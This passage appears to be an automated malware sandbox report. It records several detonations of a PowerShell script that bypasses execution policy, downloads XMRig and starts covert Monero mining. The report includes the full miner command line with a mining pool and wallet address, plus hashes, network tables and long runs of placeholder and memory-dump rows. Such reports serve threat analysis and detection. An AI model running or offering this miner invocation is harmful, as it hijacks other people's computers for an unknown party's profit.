memory/2020-142-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-143-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-144-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-145-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-146-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-147-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-148-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-149-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-150-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-151-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-152-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-153-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-154-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-155-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-156-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-157-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:37
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1756s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3560 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3560 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
Files
memory/3560-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzzpmric.n5l.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3560-10-0x00000280FF970000-0x00000280FF992000-memory.dmp
memory/3560-11-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/3560-12-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/3560-14-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/3560-15-0x00000280FF940000-0x00000280FF952000-memory.dmp
memory/3560-16-0x00000280FF720000-0x00000280FF72A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1592-47-0x000002B596800000-0x000002B596820000-memory.dmp
memory/1592-48-0x000002B598240000-0x000002B598260000-memory.dmp
memory/1592-49-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-51-0x000002B598280000-0x000002B5982A0000-memory.dmp
memory/1592-50-0x000002B598260000-0x000002B598280000-memory.dmp
memory/1592-52-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/3560-53-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp
memory/3560-54-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/1592-55-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-58-0x000002B598280000-0x000002B5982A0000-memory.dmp
memory/1592-57-0x000002B598260000-0x000002B598280000-memory.dmp
memory/1592-56-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-59-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-60-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-61-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-62-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-63-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-64-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-65-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-66-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-67-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-68-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-69-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-70-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-71-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-72-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-73-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-74-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-75-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-76-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-77-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-78-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-79-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-80-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-81-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-82-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-83-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-84-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-85-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-86-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-87-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-88-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-89-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-90-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-91-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-92-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-93-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-94-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-95-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-96-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-97-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-98-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-99-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-100-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-101-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-102-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-103-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-104-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-105-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-106-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-107-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-108-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-109-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-110-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-111-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-112-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-113-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-114-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-115-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-116-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
memory/1592-117-0x00007FF65BAF0000-0x00007FF65C723000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:38
Platform
win10-20240404-en
Max time kernel
1791s
Max time network
1758s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4556 wrote to memory of 3544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4556 wrote to memory of 3544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
Files
memory/4556-3-0x00007FF88B793000-0x00007FF88B794000-memory.dmp
memory/4556-5-0x0000024C2FD30000-0x0000024C2FD52000-memory.dmp
memory/4556-8-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
memory/4556-10-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
memory/4556-9-0x0000024C2FEE0000-0x0000024C2FF56000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mf2vqi2u.bse.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4556-25-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
memory/4556-48-0x0000024C2FEC0000-0x0000024C2FED2000-memory.dmp
memory/4556-61-0x0000024C2FEA0000-0x0000024C2FEAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3544-90-0x00000263827D0000-0x00000263827F0000-memory.dmp
memory/3544-91-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/4556-92-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
memory/4556-94-0x00007FF88B793000-0x00007FF88B794000-memory.dmp
memory/3544-93-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/4556-95-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
memory/4556-96-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
memory/3544-97-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-98-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-99-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-100-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-101-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-102-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-103-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-104-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-105-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-106-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-107-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-108-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-109-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-110-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-111-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-112-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-113-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-114-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-115-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-116-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-117-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-118-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-119-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-120-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-121-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-122-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-123-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-124-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-125-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-126-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-127-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-128-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-129-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-130-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-131-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-132-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-133-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-134-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-135-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-136-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-137-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-138-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-139-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-140-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-141-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-142-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-143-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-144-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-145-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-146-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-147-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-148-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-149-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-150-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-151-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-152-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-153-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-154-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-155-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-156-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
memory/3544-157-0x00007FF6C1E50000-0x00007FF6C2A83000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:38
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1763s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
